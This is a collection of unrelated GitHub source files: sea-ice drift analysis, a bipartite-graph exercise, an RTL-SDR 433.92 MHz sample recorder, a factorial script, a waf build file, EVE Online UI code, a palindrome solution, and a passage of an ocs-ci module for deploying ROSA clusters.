arrays for each dataset and add one layer for each day, keep -999 as missing values\n speed = np.sqrt(u**2+v**2)\n #arctan2 gives the angle from origin at [1,0] - that is 90 deg. 
clockwise of the N direction\n        ang = 90 - np.degrees(np.arctan2(v,u))\n        ws[d,:,:] = speed\n        wa[d,:,:] = ang\n        \n        speedo = np.sqrt(uo**2+vo**2)\n        ango = 90 - np.degrees(np.arctan2(vo,uo))\n        wso[d,:,:] = speedo\n        wao[d,:,:] = ango\n        \n        \n        ######################\n        #instead of this i could simply make mean error vectors\n        x_error = dX - dx_g\n        y_error = dY - dy_g\n        \n        \n        #mask the data where one of the datasets is missing\n        mask = dX.mask | dx_g.mask\n        x_error = np.ma.array(x_error,mask=mask,fill_value=-999)\n        y_error = np.ma.array(y_error,mask=mask,fill_value=-999)\n        \n        #outname = outpath_plots+'drifters_test_'+str(yr)+'.png'\n        #plot_pcolormesh(lon_osi,lat_osi,x_error,outname,vmin=-1000,vmax=1000,cmap='bwr',label='displacement error') \n        #exit()\n        \n        wex[d,:,:] = x_error/1000 #from m to km\n        wey[d,:,:] = y_error/1000\n        wic[d,:,:] = sic_g\n        \n        #outname = outpath_plots+'drifters_test_'+str(yr)+'.png'\n        #plot_pcolormesh(lon_osi,lat_osi,mask,outname,vmin=-10,vmax=10,cmap='bwr',label='displacement error') \n        #exit()\n        \n        ####END OF INNER CYCLE\n        #increase day-counter\n        d = d+1 \n    \n    #calculate correlation for each grid cell for each winter\n    mask = (ws==0)|(ws==-999)\n    ws = np.ma.array(ws,mask=mask)\n    wso = np.ma.array(wso,mask=mask)\n    wa = np.ma.array(wa,mask=mask) #masked values became 0 in division\n    wao = np.ma.array(wao,mask=mask)\n    \n    scorr = corr_pearson(wso,ws)\n    \n    ma,mb,diff,acorr = corr_pearson_circ(wao,wa)\n    \n    #make correlation maps (for speed and direction) for each winter\n    outname = outpath_plots+'drifters_corr_speed_'+str(yr)+'.png'\n    plot_pcolormesh(lon_osi,lat_osi,scorr,outname,vmin=0,vmax=1,cmap='bwr',label='correlation')\n\n    outname = outpath_plots+'drifters_corr_angle_'+str(yr)+'.png'\n    plot_pcolormesh(lon_osi,lat_osi,acorr,outname,vmin=0,vmax=1,cmap='bwr',label='correlation')\n\n    #and angle differences\n    #import matplotlib.colors\n    #circ_cmap = matplotlib.colors.LinearSegmentedColormap.from_list(\"\", [\"purple\",\"red\",\"white\",\"blue\",\"purple\"])\n    #outname = outpath_plots+'drifters_diff_angle1_'+str(yr)+'.png'\n    #plot_pcolormesh(lon_osi,lat_osi,ma,outname,vmin=0,vmax=360,cmap='bwr',label='mean angle')\n    #outname = outpath_plots+'drifters_diff_angle2_'+str(yr)+'.png'\n    #plot_pcolormesh(lon_osi,lat_osi,mb,outname,vmin=0,vmax=360,cmap='bwr',label='mean angle') \n    outname = outpath_plots+'drifters_diff_angle_'+str(yr)+'.png'\n    plot_pcolormesh(lon_osi,lat_osi,diff,outname,vmin=-180,vmax=180,cmap='bwr',label='angle diff')\n\n    #and error/residual maps\n    mask = (wic<.15)|(sf<10)|(wex==wey)\n    wex = np.ma.array(wex,mask=mask)\n    wey = np.ma.array(wey,mask=mask)\n    \n    #mean daily displacements: divide the 2-day values by 2 to get km/day\n    mwex = np.mean(wex,axis=0)/2 #get km/day\n    mwey = np.mean(wey,axis=0)/2\n    \n    #quiver plot\n    outname = outpath_plots+'drifters_residual_'+str(yr)+'.png'\n    plot_quiver(xc,yc,mwex,mwey,outname,cmap='viridis',label='mean error motion (km/day)',vmin=0,vmax=3,scale=150)\n    \n    #also make a PDF of speeds for every year\n    mask=ws==0\n    slist = ws[ws.mask == False].flatten()\n    slisto = wso[ws.mask == False].flatten()\n    \n    outname = outpath_plots+'drifters_pdf_'+str(yr)+'.png'\n    plot_pdf(slist,slisto,outname)\n    \n    #print(slist)\n    #exit()\n    \n    sl_all.extend(slist)\n    slo_all.extend(slisto) #OSI-SAF speeds; extending with slist here a second time was a bug\n    \n#PDF for the whole period\noutname = 
outpath_plots+'drifters_pdf_all.png'\nplot_pdf(sl_all,slo_all,outname)\n\n\n\n","repo_name":"nansencenter/nextsim-age","sub_path":"age_drifters.py","file_name":"age_drifters.py","file_ext":"py","file_size_in_byte":11298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31612300245","text":"#\n# Write a function, `bipartite` that\n# takes as input a graph, `G` and tries\n# to divide G into two sets where\n# there are no edges between elements of the\n# the same set - only between elements in\n# different sets.\n# If two sets exists, return one of them\n# or `None` otherwise\n# Assume G is connected\n#\n\nimport timeit\n\n\n# Given this function\ndef make_link(G, node1, node2):\n if node1 not in G:\n G[node1] = {}\n (G[node1])[node2] = 1\n if node2 not in G:\n G[node2] = {}\n (G[node2])[node1] = 1\n return G\n\n\ndef bipartite(G):\n # TODO: Essentially a breadth first search of the graph...without using a queue\n # Start at arbitrary node in graph. Append it to set1 and mark it as so, using a dict. Check edges for unmarked\n # nodes. Any found must be in the opposite set for it to be valid. Now we must do the same for the group of nodes we\n # placed in set 2. Check edges for nodes, following same procedure for unmarked nodes. For marked neighbours, if\n # they are in same set as the node, that means the graph is invalid, as it was placed there to move it away from\n # another node in opposite set and cannot move it there. Mark ths graph as invalid, but continue on to produce a\n # graph anyway (could be trimmed of bad edges if we mark them as bad to get valid graph).\n # This procedure starts after intialising a start node, then continues checking each new group of nodes, alternating\n # between sets till all nodes have been placed in either set. If it is possible to create a bipartite graph,\n # this algorithm will create a valid form, else it will mark the attempt as invalid. This is because we have checked\n # every edge in the graph (twice) to make sure the nodes are in opposite sets, and done so in a sequential manner,\n # meaning each nodes placement relies on the chain of nodes before it.\n\n # Initialise start node as first node in dict keys list (doesnt matter where we start)\n reference_node = list(G)[0]\n sets = [[reference_node], []]\n set_index = 1\n slice_index = [0, 0]\n # Add marker for each node in the graph so we know which set it has been put it, if any. 0=set1, 1=set2\n markers = {reference_node: 0}\n invalid_graph = False\n break_loop = False\n # Loop till we have placed all nodes into either set\n while True:\n # All nodes placed into a set, just have to check edges of the last group of nodes before we break loop,\n # in case they are connected to other nodes in same set. 
If this check were placed at the end of the loop, it would terminate\n        # early, as we mark before checking edges, potentially returning an invalid graph.\n        if len(markers) == len(G):\n            break_loop = True\n        # alternate between set1 and set2: 1-0 = 1, 1-1 = 0\n        set_index = 1 - set_index\n        current_set = sets[set_index]\n        other_set = sets[1 - set_index]\n        # Check edges of each node in the current set, and then place the connected nodes in the other set.\n        for node in current_set[slice_index[set_index]:]:  # only search new nodes added to set\n            # increment slice index for next loop for each new node found\n            slice_index[set_index] += 1\n            for neighbour in G[node]:\n                # If neighbour is marked, check if it's in the same group; if so, we cannot create a bipartite graph.\n                if neighbour in markers:\n                    if markers[neighbour] != 1 - set_index:\n                        # print(\"edge between nodes:\", node, \",\", neighbour, \"in set\",\n                        #       set_index + 1, \"- graph cannot be transformed into bipartite form\")\n                        invalid_graph = True\n                else:  # New node found, add to other set, marking it\n                    markers[neighbour] = 1 - set_index\n                    other_set.append(neighbour)\n\n        # All nodes are placed into either set and edges have been checked, graph is transformed into valid bipartite\n        # graph, or marked as invalid. Must now break while loop.\n        if break_loop:\n            break\n\n    if invalid_graph:\n        return None\n    else:\n        # print(sets)\n        return set(sets[0])\n\n\ndef test_bipartite():\n    edges = [(1, 2), (2, 3), (1, 4), (2, 5),\n             (3, 8), (5, 6)]\n    bi_edges = [(1, 5), (2, 5), (2, 6), (7, 2), (3, 7), (3, 5), (7, 4)]\n    bad_edges = [(7, 2), (2, 5), (1, 5), (3, 4), (2, 6), (7, 4), (3, 7), (3, 5)]\n    G = {}\n    for n1, n2 in edges:\n        make_link(G, n1, n2)\n    g1 = bipartite(G)\n    assert (g1 == set([1, 3, 5]) or\n            g1 == set([2, 4, 6, 8]))\n    edges = [(1, 2), (1, 3), (2, 3)]\n    G = {}\n    for n1, n2 in edges:\n        make_link(G, n1, n2)\n    g1 = bipartite(G)\n    assert g1 == None\n\n\nsetup2 = \"from __main__ import bipartite\\nfrom __main__ import make_link\"\ncode2 = \"bi_edges = [(1, 5), (2, 5), (2, 6), (7, 2), (3, 7), (3, 5), (7, 4)]\\n\" \\\n        \"bad_edges = [(7, 2), (2, 5), (1, 5), (3, 4), (2, 6), (7, 4), (3, 7), (3, 5)]\\n\" \\\n        \"b1 = {}\\nfor n1, n2 in bi_edges:\\n    make_link(b1, n1, n2)\\n\" \\\n        \"b2 = {}\\nfor n1, n2 in bad_edges:\\n    make_link(b2, n1, n2)\\n\" \\\n        \"bipartite(b1); bipartite(b2)\"\ntime = timeit.timeit(setup=setup2, stmt=code2, number=10000)\nprint(time)\n","repo_name":"lamelameo/Algorithms-Udacity-Misc","sub_path":"Udacity/cs215 - Intro to Algorithms/final assessment/bipartite.py","file_name":"bipartite.py","file_ext":"py","file_size_in_byte":5262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12919603226","text":"from scipy import signal\nfrom numpy import max, abs, int16\nfrom rtlsdr import RtlSdr\nfrom scipy.io import wavfile\nfrom datetime import datetime\n\nN = 4096000\nFREQ = 433.92e6\nF_OFFSET = 0.02e6\nGAIN = 15\nSAMPLE_RATE = 1e6\n\ndef initialize():\n    global sdr\n    fc = FREQ - F_OFFSET\n    sdr = RtlSdr()\n    sdr.center_freq = fc\n    sdr.sample_rate = SAMPLE_RATE\n    sdr.gain = GAIN\n\ndef current_time():\n    time = datetime.now()\n    current_time = time.strftime(\"%H:%M:%S\")\n    return current_time\n\n\ndef record():\n    #print(\"start\")\n    \n    samples = sdr.read_samples(N)\n    # decimated = signal.decimate(samples, 20) #at a factor of 20 the signal is still fairly clearly visible\n    # scaled = int16(decimated.real / max(abs(decimated)) * 32767)\n    # wavfile.write('../../remote-control-hacking/recorded_signals_urh/1_off/out2.wav', int(sdr.sample_rate), scaled.astype(\"int16\"))\n    # print(\"end\")\n    return samples\n\n\ndef decimate(samples):\n    # at a factor of 20 the signal is still fairly clearly visible\n    decimated = signal.decimate(samples, 20)\n    scaled = int16(decimated.real / max(abs(decimated)) * 32767)\n    return scaled\n","repo_name":"kubamarchut/remote-control-hacking","sub_path":"final-system/record.py","file_name":"record.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23159701458","text":"def factorial(number):\n    if number == 0 or number==1:\n        return 1\n    else:\n        return number * factorial(number - 1)\ndef factorialTraillngZeros(number):\n    count=0\n    fac = factorial(number)\n    #print(fac)\n    while (fac % 10 == 0):\n        count = count + 1\n        fac = fac // 10  # integer division; '/' would turn fac into an imprecise float for large factorials\n    return count\nif __name__ == \"__main__\":\n    number = int(input(\"Enter the number :\\n\"))\n    fac = factorial(number)\n    print(f\"The factorial of {number} is {fac}.\")\n    zero = factorialTraillngZeros(number)\n    print(f\"The number of trailing zeros in the factorial is {zero}.\")","repo_name":"ManishKumarShah/Factorial-and-Numbers-of-Trailing-zero","sub_path":"factorialAndTrailingZeros.py","file_name":"factorialAndTrailingZeros.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"21752915030","text":"#!/bin/python\n\nfrom waflib import *\nimport os\n\ntop = '.'\nout = 'build'\n\nprojname = 'boomfield'\ncoreprog_name = projname\n\ng_cflags = [\"-Wall\", \"-std=gnu11\", \"-pthread\"]\n\ndef btype_cflags(ctx):\n\treturn {\n\t\t\"DEBUG\" : g_cflags + [\"-Wextra\", \"-Og\", \"-ggdb3\", \"-march=core2\", \"-mtune=native\"],\n\t\t\"NATIVE\" : g_cflags + [\"-Ofast\", \"-march=native\", \"-mtune=native\"],\n\t\t\"RELEASE\" : g_cflags + [\"-O3\", \"-march=core2\", \"-mtune=generic\"],\n\t}.get(ctx.env.BUILD_TYPE, g_cflags)\n\ndef options(opt):\n\topt.load(\"gcc\")\n\topt.add_option('--build_type', dest='build_type', type=\"string\", default='RELEASE', action='store', help=\"DEBUG, NATIVE, RELEASE\")\n\ndef configure(ctx):\n\tctx.load(\"gcc\")\n\tbtup = ctx.options.build_type.upper()\n\tif btup in [\"DEBUG\", \"NATIVE\", \"RELEASE\"]:\n\t\tLogs.pprint(\"PINK\", \"Setting up environment for known build type: \" + btup)\n\t\tctx.env.BUILD_TYPE = btup\n\t\tctx.env.CFLAGS = btype_cflags(ctx)\n\t\tLogs.pprint(\"PINK\", \"CFLAGS: \" + ' '.join(ctx.env.CFLAGS))\n\telse:\n\t\tLogs.error(\"UNKNOWN BUILD TYPE: \" + btup)\n\ndef build(bld):\n\tfiles = bld.path.ant_glob('src/*.c')\n\tbld.install_files('${PREFIX}/include/boomfield', ['src/tracer.h'])\n\tcoreprog = bld (\n\t\tfeatures = \"c cshlib\",\n\t\ttarget = coreprog_name,\n\t\tsource = files,\n\t\tlib = [],\n\t\tuselib = []\n\t)\n\t\ndef clean(ctx):\n\tpass\n","repo_name":"cagelight/boomfield","sub_path":"wscript","file_name":"wscript","file_ext":"","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37019006481","text":"#Embedded file name: e:\\jenkins\\workspace\\client_SERENITY\\branches\\release\\SERENITY\\eve\\client\\script\\ui\\shared\\assetsSearch.py\r\nfrom eveAssets.assetSearchUtil import IsPartOfText, IsTextMatch, ParseString\r\nimport uiprimitives\r\nimport uicontrols\r\nimport carbonui.const as uiconst\r\nimport base\r\nimport localization\r\n\r\nclass SearchBox(uicontrols.SinglelineEdit):\r\n    __guid__ = 'assets.SearchBox'\r\n    
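# the 'default_' prefix presumably marks a CarbonUI-style class default that per-instance attributes can override\r\n    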
default_dynamicHistoryWidth = True\r\n\r\n def ApplyAttributes(self, attributes):\r\n uicontrols.SinglelineEdit.ApplyAttributes(self, attributes)\r\n self.blockSetValue = True\r\n self.TEXTRIGHTMARGIN = 1\r\n self.searchKeywords = attributes.get('keywords', [])\r\n self.CreateLayout()\r\n\r\n def SetValue(self, text, *args, **kwargs):\r\n oldText = self.GetValue()\r\n uicontrols.SinglelineEdit.SetValue(self, text, *args, **kwargs)\r\n self.caretIndex = self.GetCursorFromIndex(self.GetSmartCaretIndex(oldText, text))\r\n self.RefreshCaretPosition()\r\n\r\n def GetSmartCaretIndex(self, oldText, newText):\r\n oldText = oldText[::-1]\r\n newText = newText[::-1]\r\n for i in xrange(len(oldText)):\r\n if oldText[i] != newText[i]:\r\n return len(newText) - i\r\n\r\n return len(newText)\r\n\r\n def CreateLayout(self):\r\n self.optionIcon = uiprimitives.Sprite(parent=self.sr.maincontainer, name='options', texturePath='res:/UI/Texture/Icons/38_16_229.png', pos=(0, 0, 16, 16), align=uiconst.TORIGHT, idx=0, hint=localization.GetByLabel('UI/Inventory/AssetSearch/KeywordOptionsHint'))\r\n self.optionIcon.SetAlpha(0.8)\r\n self.optionIcon.OnClick = self.OnOptionClick\r\n\r\n def OnOptionClick(self):\r\n self.ShowHistoryMenu(self.GetStaticHints())\r\n\r\n def GetStaticHints(self):\r\n currentText = self.GetValue(registerHistory=0)\r\n currentText = currentText.rstrip()\r\n if currentText:\r\n currentText += ' '\r\n hints = []\r\n for kw in self.searchKeywords:\r\n hints.append((localization.GetByLabel('UI/Inventory/AssetSearch/KeywordHint', keyword=kw.keyword, description=kw.optionDescription), '%s%s: ' % (currentText, kw.keyword)))\r\n\r\n return hints\r\n\r\n def GetDynamicHints(self):\r\n hints = []\r\n caretIndex = self.caretIndex[0]\r\n currentText = self.GetValue(registerHistory=0)\r\n headText, tailText = currentText[:caretIndex], currentText[caretIndex:]\r\n tailText = tailText.lstrip()\r\n trimmedText = headText.rstrip()\r\n if trimmedText.endswith(':'):\r\n strippedText, lastWord = self.SplitText(trimmedText, removeSeprator=True)\r\n if lastWord:\r\n for kw in self.IterMatchingKeywords(lastWord):\r\n if kw.specialOptions:\r\n for option in kw.specialOptions:\r\n hints.append((localization.GetByLabel('UI/Inventory/AssetSearch/OptionHint', keyword=kw.keyword, option=option), '%s%s: %s %s' % (strippedText,\r\n kw.keyword,\r\n option,\r\n tailText)))\r\n\r\n else:\r\n strippedText, lastWord = self.SplitText(trimmedText, removeSeprator=False)\r\n freeText, matches = ParseString(trimmedText)\r\n if lastWord:\r\n if matches and IsTextMatch(lastWord, matches[-1][1]):\r\n keyword, value = matches[-1]\r\n for kw in self.IterMatchingKeywords(keyword):\r\n if kw.specialOptions:\r\n for option in kw.specialOptions:\r\n if IsPartOfText(option, value):\r\n hints.append((localization.GetByLabel('UI/Inventory/AssetSearch/OptionHint', keyword=kw.keyword, option=option), '%s%s %s' % (strippedText, option, tailText)))\r\n\r\n break\r\n\r\n else:\r\n for kw in self.IterMatchingKeywords(lastWord):\r\n hints.append((localization.GetByLabel('UI/Inventory/AssetSearch/KeywordHint', keyword=kw.keyword, description=kw.optionDescription), '%s%s: %s' % (strippedText, kw.keyword, tailText)))\r\n\r\n return hints\r\n\r\n def IterMatchingKeywords(self, keyword):\r\n for kw in self.searchKeywords:\r\n if IsPartOfText(kw.keyword, keyword):\r\n yield kw\r\n\r\n def SplitText(self, baseText, removeSeprator = False):\r\n strippedText, lastWord = (None, None)\r\n parts = baseText.split()\r\n if parts:\r\n lastWord = parts[-1]\r\n 
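# e.g. baseText 'sec: nam:' with removeSeprator=True returns ('sec: ', 'nam') - illustrative values only\r\n            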
strippedText = baseText[:-len(lastWord)]\r\n if removeSeprator:\r\n lastWord = lastWord[:-1]\r\n if strippedText:\r\n strippedText = strippedText.rstrip() + ' '\r\n return (strippedText, '' if lastWord is None else lastWord.lower())\r\n\r\n def TryRefreshHistory(self, currentString):\r\n self.refreshHistoryTimer = base.AutoTimer(200, self.TryRefreshHistory_Thread, currentString)\r\n\r\n def TryRefreshHistory_Thread(self, currentString):\r\n if currentString.rstrip().endswith(':'):\r\n self.CheckHistory()\r\n self.refreshHistoryTimer = None\r\n\r\n def OnHistoryClick(self, clickedString):\r\n self.TryRefreshHistory(clickedString)\r\n\r\n def OnComboChange(self, combo, label, value, *args):\r\n self.SetValue(label, updateIndex=0)\r\n self.TryRefreshHistory(value)\r\n\r\n def GetValid(self):\r\n valid = uicontrols.SinglelineEdit.GetValid(self)\r\n history = [ (text, text) for text in valid ]\r\n hints = self.GetDynamicHints()\r\n return hints + history\r\n\r\n def Confirm(self, *args):\r\n active = getattr(self, 'active', None)\r\n if active:\r\n text = active.string\r\n self.SetValue(text)\r\n uicontrols.SinglelineEdit.Confirm(self, *args)\r\n if active:\r\n self.TryRefreshHistory(text)\r\n","repo_name":"connoryang/dec-eve-serenity","sub_path":"client/eve/client/script/ui/shared/assetsSearch.py","file_name":"assetsSearch.py","file_ext":"py","file_size_in_byte":5977,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"11443643355","text":"class Solution:\n def validPalindrome(self, s: str) -> bool:\n temp = list(s)\n # print(temp, temp[::-1])\n if temp == temp[::-1]: \n print(\"t\")\n return True\n \n f = 0\n b = len(s)-1\n count = 0\n \n while b-f>0:\n if s[f]!=s[b]:\n if count == 1: return False\n if s[f+1]==s[b] and s[f+2]==s[b-1]:\n f+=1\n count+=1\n elif s[f]==s[b-1] and s[f+1]==s[b-2]:\n b-=1\n count+=1\n else:\n return False\n f+=1\n b-=1\n # print(s[f],s[b],count)\n return True\n \n\n# class Solution:\n# def validPalindrome(self, s: str) -> bool:\n# def check_palindrome(s, i, j):\n# while i < j:\n# if s[i] != s[j]:\n# return False\n# i += 1\n# j -= 1\n \n# return True\n\n# i = 0\n# j = len(s) - 1\n# while i < j:\n# # Found a mismatched pair - try both deletions\n# if s[i] != s[j]:\n# return check_palindrome(s, i, j - 1) or check_palindrome(s, i + 1, j)\n# i += 1\n# j -= 1\n \n# return True\n \n# class Solution(object):\n# def validPalindrome(self, s):\n# h, t = 0, len(s) - 1 # head and tail\n# while h < t:\n# if s[h] != s[t]: # delete s[h] or s[t] and validate palindrome finally\n# return s[h:t] == s[h:t][::-1] or s[h + 1:t + 1] == s[h + 1:t + 1][::-1]\n# h, t = h + 1, t - 1\n# return True\n","repo_name":"kwilliam777/CodingTestStudy","sub_path":"weekly assingment/week12/k_680_e_x.py","file_name":"k_680_e_x.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"2182123913","text":"# -*- coding: utf8 -*-\n\"\"\"\nModule for interactions with Openshift Dedciated Cluster.\n\"\"\"\n\n\nimport json\nimport logging\nimport os\nimport re\n\nfrom ocs_ci.framework import config\nfrom ocs_ci.ocs.exceptions import (\n ManagedServiceAddonDeploymentError,\n UnsupportedPlatformVersionError,\n ConfigurationError,\n)\nfrom ocs_ci.utility import openshift_dedicated as ocm\nfrom ocs_ci.utility import utils\n\nfrom ocs_ci.utility.aws import AWS as AWSUtil\nfrom ocs_ci.utility.managedservice import (\n remove_header_footer_from_key,\n 
generate_onboarding_token,\n    get_storage_provider_endpoint,\n)\n\n\nlogger = logging.getLogger(name=__file__)\nrosa = config.AUTH.get(\"rosa\", {})\n\n\ndef login():\n    \"\"\"\n    Login to ROSA client\n    \"\"\"\n    token = rosa[\"token\"]  # the AUTH 'rosa' section loaded above; subscripting the imported ocm module would raise TypeError\n    cmd = f\"rosa login --token={token}\"\n    logger.info(\"Logging in to ROSA cli\")\n    utils.run_cmd(cmd, secrets=[token])\n    logger.info(\"Successfully logged in to ROSA\")\n\n\ndef create_cluster(cluster_name, version, region):\n    \"\"\"\n    Create OCP cluster.\n\n    Args:\n        cluster_name (str): Cluster name\n        version (str): cluster version\n        region (str): Cluster region\n\n    \"\"\"\n\n    rosa_ocp_version = config.DEPLOYMENT[\"installer_version\"]\n    # Validate ocp version with rosa ocp supported version\n    # Select the valid version if given version is invalid\n    if not validate_ocp_version(rosa_ocp_version):\n        logger.warning(\n            f\"Given OCP version {rosa_ocp_version} \"\n            f\"is not a valid ROSA OCP version. \"\n            f\"Selecting latest rosa version for deployment\"\n        )\n        rosa_ocp_version = get_latest_rosa_version(version)\n        logger.info(f\"Using OCP version {rosa_ocp_version}\")\n\n    create_account_roles(version)\n    compute_nodes = config.ENV_DATA[\"worker_replicas\"]\n    compute_machine_type = config.ENV_DATA[\"worker_instance_type\"]\n    multi_az = \"--multi-az \" if config.ENV_DATA.get(\"multi_availability_zones\") else \"\"\n    cluster_type = config.ENV_DATA.get(\"cluster_type\", \"\")\n    provider_name = config.ENV_DATA.get(\"provider_name\", \"\")\n    rosa_mode = config.ENV_DATA.get(\"rosa_mode\", \"\")\n    cmd = (\n        f\"rosa create cluster --cluster-name {cluster_name} --region {region} \"\n        f\"--compute-nodes {compute_nodes} --compute-machine-type \"\n        f\"{compute_machine_type} --version {rosa_ocp_version} {multi_az}--sts --yes\"\n    )\n    if rosa_mode == \"auto\":\n        cmd += \" --mode auto\"\n    if cluster_type.lower() == \"consumer\" and config.ENV_DATA.get(\"provider_name\", \"\"):\n        aws = AWSUtil()\n        subnet_id = config.ENV_DATA.get(\"subnet_ids\") or \",\".join(\n            aws.get_cluster_subnet_ids(provider_name)\n        )\n        cmd = f\"{cmd} --subnet-ids {subnet_id}\"\n\n    utils.run_cmd(cmd, timeout=1200)\n    if rosa_mode != \"auto\":\n        logger.info(\n            \"Waiting for ROSA cluster status changed to waiting or pending state\"\n        )\n        for cluster_info in utils.TimeoutSampler(\n            4500, 30, ocm.get_cluster_details, cluster_name\n        ):\n            status = cluster_info[\"status\"][\"state\"]\n            logger.info(f\"Current installation status: {status}\")\n            if status == \"waiting\" or status == \"pending\":\n                logger.info(f\"Cluster is in {status} state\")\n                break\n        create_operator_roles(cluster_name)\n        create_oidc_provider(cluster_name)\n\n    logger.info(\"Waiting for installation of ROSA cluster\")\n    for cluster_info in utils.TimeoutSampler(\n        4500, 30, ocm.get_cluster_details, cluster_name\n    ):\n        status = cluster_info[\"status\"][\"state\"]\n        logger.info(f\"Current installation status: {status}\")\n        if status == \"ready\":\n            logger.info(\"Cluster was installed\")\n            break\n    cluster_info = ocm.get_cluster_details(cluster_name)\n    # Create metadata file to store the cluster name\n    cluster_info[\"clusterName\"] = cluster_name\n    cluster_info[\"clusterID\"] = cluster_info[\"id\"]\n    cluster_path = config.ENV_DATA[\"cluster_path\"]\n    metadata_file = os.path.join(cluster_path, \"metadata.json\")\n    with open(metadata_file, \"w+\") as f:\n        json.dump(cluster_info, f)\n\n\ndef appliance_mode_cluster(cluster_name, ocp_version, region):\n    \"\"\"\n    Create appliance mode provider cluster\n\n    Args:\n        cluster_name (str): Cluster name\n        ocp_version (str): 
cluster version\n region (str): Cluster region\n\n \"\"\"\n addon_name = config.ENV_DATA.get(\"addon_name\", \"\")\n size = config.ENV_DATA[\"size\"]\n public_key = config.AUTH.get(\"managed_service\", {}).get(\"public_key\", \"\")\n subnet_ids = config.ENV_DATA[\"subnet_ids\"]\n notification_email_0 = config.REPORTING.get(\"notification_email_0\")\n notification_email_1 = config.REPORTING.get(\"notification_email_1\")\n notification_email_2 = config.REPORTING.get(\"notification_email_2\")\n region = config.ENV_DATA.get(\"region\", \"\")\n if not public_key:\n raise ConfigurationError(\n \"Public key for Managed Service not defined.\\n\"\n \"Expected following configuration in auth.yaml file:\\n\"\n \"managed_service:\\n\"\n ' private_key: \"...\"\\n'\n ' public_key: \"...\"'\n )\n public_key_only = remove_header_footer_from_key(public_key)\n cmd = (\n f\"rosa create service --type {addon_name} --name {cluster_name} \"\n f\"--size {size} --onboarding-validation-key {public_key_only} \"\n f\"--subnet-ids {subnet_ids}\"\n )\n if notification_email_0:\n cmd = cmd + f\" --notification-email-0 {notification_email_0}\"\n if notification_email_1:\n cmd = cmd + f\" --notification-email-1 {notification_email_1}\"\n if notification_email_2:\n cmd = cmd + f\" --notification-email-2 {notification_email_2}\"\n if region:\n cmd = cmd + f\" --region {region}\"\n\n utils.run_cmd(cmd, timeout=1200)\n logger.info(\"Waiting for ROSA cluster status changed to waiting or pending state\")\n for cluster_info in utils.TimeoutSampler(\n 4500, 30, ocm.get_cluster_details, cluster_name\n ):\n status = cluster_info[\"status\"][\"state\"]\n logger.info(f\"Current installation status: {status}\")\n if status == \"waiting\" or status == \"pending\":\n logger.info(f\"Cluster is in {status} state\")\n break\n create_operator_roles(cluster_name)\n create_oidc_provider(cluster_name)\n\n logger.info(\"Waiting for installation of ROSA cluster\")\n for cluster_info in utils.TimeoutSampler(\n 4500, 30, ocm.get_cluster_details, cluster_name\n ):\n status = cluster_info[\"status\"][\"state\"]\n logger.info(f\"Cluster installation status: {status}\")\n if status == \"ready\":\n logger.info(\"Cluster is installed\")\n break\n if cluster_info[\"status\"][\"state\"] == \"ready\":\n for addon_info in utils.TimeoutSampler(\n 7200, 30, get_addon_info, cluster_name, addon_name\n ):\n logger.info(f\"Current addon installation info: \" f\"{addon_info}\")\n if \"ready\" in addon_info:\n logger.info(f\"Addon {addon_name} is installed\")\n break\n if \"failed\" in addon_info:\n raise ManagedServiceAddonDeploymentError(\n f\"Addon {addon_name} failed to be installed\"\n )\n logger.info(\"Waiting for ROSA service ready status\")\n for service_status in utils.TimeoutSampler(\n 7200, 30, get_rosa_service_details, cluster_name\n ):\n if \"ready\" in service_status:\n logger.info(f\"service {cluster_name} is ready\")\n break\n elif \"failed\" in service_status:\n logger.info(f\"service {cluster_name} is ready\")\n break\n else:\n logger.info(f\"Current service creation status: {service_status}\")\n\n\ndef get_rosa_service_details(cluster):\n \"\"\"\n Returns info about the rosa service cluster.\n\n Args:\n cluster (str): Cluster name.\n\n \"\"\"\n cmd = \"rosa list services\"\n # cmd = f\"rosa list services -o json --region {region}\"\n services_details = utils.run_cmd(cmd, timeout=1200)\n # services_details = json.loads(out)\n for service_info in services_details.splitlines():\n if cluster in service_info:\n return service_info\n # Todo : update 
this function when -o json get supported in rosa services command\n # TODO : need exception handling\n return json.loads(service_info)\n\n\ndef get_latest_rosa_version(version):\n \"\"\"\n Returns latest available z-stream version available for ROSA.\n\n Args:\n version (str): OCP version in format `x.y`\n\n Returns:\n str: Latest available z-stream version\n\n \"\"\"\n cmd = \"rosa list versions\"\n output = utils.run_cmd(cmd)\n logger.info(f\"Looking for z-stream version of {version}\")\n rosa_version = None\n for line in output.splitlines():\n match = re.search(f\"^{version}\\\\.(\\\\d+) \", line)\n if match:\n rosa_version = match.group(0).rstrip()\n break\n if rosa_version is None:\n logger.error(f\"Could not find any version of {version} available for ROSA\")\n logger.info(\"Try providing an older version of OCP with --ocp-version\")\n logger.info(\"Latest OCP versions available for ROSA are:\")\n for i in range(3):\n logger.info(f\"{output.splitlines()[i + 1]}\")\n raise UnsupportedPlatformVersionError\n return rosa_version\n\n\ndef validate_ocp_version(version):\n \"\"\"\n Validate the version whether given version is z-stream version available for ROSA.\n\n Args:\n version (str): OCP version string\n\n Returns:\n bool: True if given version is available in z-stream version for ROSA\n else False\n \"\"\"\n cmd = \"rosa list versions -o json\"\n out = utils.run_cmd(cmd)\n output = json.loads(out)\n available_versions = [info[\"raw_id\"] for info in output]\n if version in available_versions:\n logger.info(f\"OCP versions {version} is available for ROSA\")\n return True\n else:\n logger.info(\n f\"Given OCP versions {version} is not available for ROSA. \"\n f\"Valid OCP versions supported on ROSA are : {available_versions}\"\n )\n return False\n\n\ndef create_account_roles(version, prefix=\"ManagedOpenShift\"):\n \"\"\"\n Create the required account-wide roles and policies, including Operator policies.\n\n Args:\n version (str): cluster version\n prefix (str): role prefix\n\n \"\"\"\n cmd = f\"rosa create account-roles --mode auto\" f\" --prefix {prefix} --yes\"\n utils.run_cmd(cmd, timeout=1200)\n\n\ndef 